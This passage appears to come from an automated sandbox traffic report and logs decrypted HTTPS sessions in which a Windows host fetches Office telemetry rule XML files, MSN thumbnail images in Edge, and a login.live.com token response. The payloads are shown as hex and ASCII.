JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.5	49904	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:30 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:30 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 87508d13-a01e-0098-09d5-338556000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093330Z-174f7845968glpgnhC1EWR7uec00000004zg0000000016h0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:30 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.5	49905	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:30 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:30 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 87508d14-a01e-0098-0ad5-338556000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093330Z-174f7845968n2hr8hC1EWR9cag00000004f00000000017yv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:30 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.5	49906	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:30 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:30 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 7cd11897-e01e-0052-7bd5-33d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093330Z-174f7845968psccphC1EWRuz9s000000051g000000002r80 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:30 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	49912	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:30 UTC	506	OUT	GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:30 UTC	550	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t Last-Modified: Fri, 01 Nov 2024 15:19:08 GMT X-Source-Length: 17955 X-Datacenter: northeu X-ActivityId: d2440427-50e1-4b1e-9511-bbaa45a53b32 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 8192 Cache-Control: public, max-age=366331 Expires: Fri, 15 Nov 2024 15:19:01 GMT Date: Mon, 11 Nov 2024 09:33:30 GMT Connection: close
2024-11-11 09:33:30 UTC	8192	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.5	49909	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:30 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:30 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: b85e0199-b01e-0098-60d5-33cead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093330Z-174f7845968v79b7hC1EWRu01s00000004fg000000000cug x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:31 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.5	49910	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:30 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:30 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: c056ec92-701e-001e-03d5-33f5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093330Z-174f784596886s2bhC1EWR743w00000004s0000000006e9g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:31 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.5	49913	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:31 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:31 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 78b03aef-101e-000b-52d5-335e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093331Z-174f7845968cdxdrhC1EWRg0en00000004rg000000003eys x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:31 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.5	49914	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:31 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:31 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 63eb2b55-501e-00a3-51d5-33c0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093331Z-174f7845968px8v7hC1EWR08ng00000004wg00000000agne x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:31 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.5	49915	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:31 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:31 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 27f4d8c4-701e-0032-2dd5-33a540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093331Z-174f7845968swgbqhC1EWRmnb400000004x0000000004vv1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:31 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	49911	40.126.31.69	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:31 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-11 09:33:31 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-11 09:33:31 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 11 Nov 2024 09:32:31 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C527_BAY x-ms-request-id: 3cbf04c0-9b62-40a9-8c86-e60c556ffec3 PPServer: PPV: 30 H: PH1PEPF0001B6CB V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 11 Nov 2024 09:33:30 GMT Connection: close Content-Length: 11391
2024-11-11 09:33:31 UTC	11391	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	49916	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:31 UTC	505	OUT	GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:31 UTC	548	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Sat, 09 Nov 2024 13:52:58 GMT X-Datacenter: eastus X-ActivityId: 98e969a8-4f49-4d93-9fd2-e52de745d7b3 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t X-Source-Length: 62552 Content-Length: 8192 Cache-Control: public, max-age=274767 Expires: Thu, 14 Nov 2024 13:52:58 GMT Date: Mon, 11 Nov 2024 09:33:31 GMT Connection: close
2024-11-11 09:33:31 UTC	8192	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
